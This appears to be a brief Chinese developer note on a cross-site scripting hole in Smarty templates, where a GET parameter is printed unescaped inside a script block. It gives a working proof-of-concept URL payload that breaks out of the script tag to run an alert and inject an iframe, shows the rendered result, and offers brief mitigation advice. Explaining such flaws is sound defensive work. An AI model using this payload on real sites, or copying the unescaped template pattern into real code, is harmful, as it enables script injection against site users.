$smarty.get 利用js跨站攻击 ...

1.在js中调用了$smarty.get.key

  看下列代码;a.php?key="</script><script>window.alert('test');</script><iframe src="http://www.baidu.com" frameborder="0" width="960" height="640"></iframe><script>"

js代码如下：

<script>

var key="<{$smarty.get.key}>";

</script>

代码置换以后就会变成如下：

<script>

var key=”"

</script>

<script>

window.alert('test');

</script>

<iframe src="http://www.baidu.com" frameborder="0" width="960" height="640"></iframe>

<script>"

</script>

显而易见 被攻击了

url地址一定不能当做参数传递给作为iframe 地址

可以间接保存到数据库中查询出来，保证每个url都是可以信任的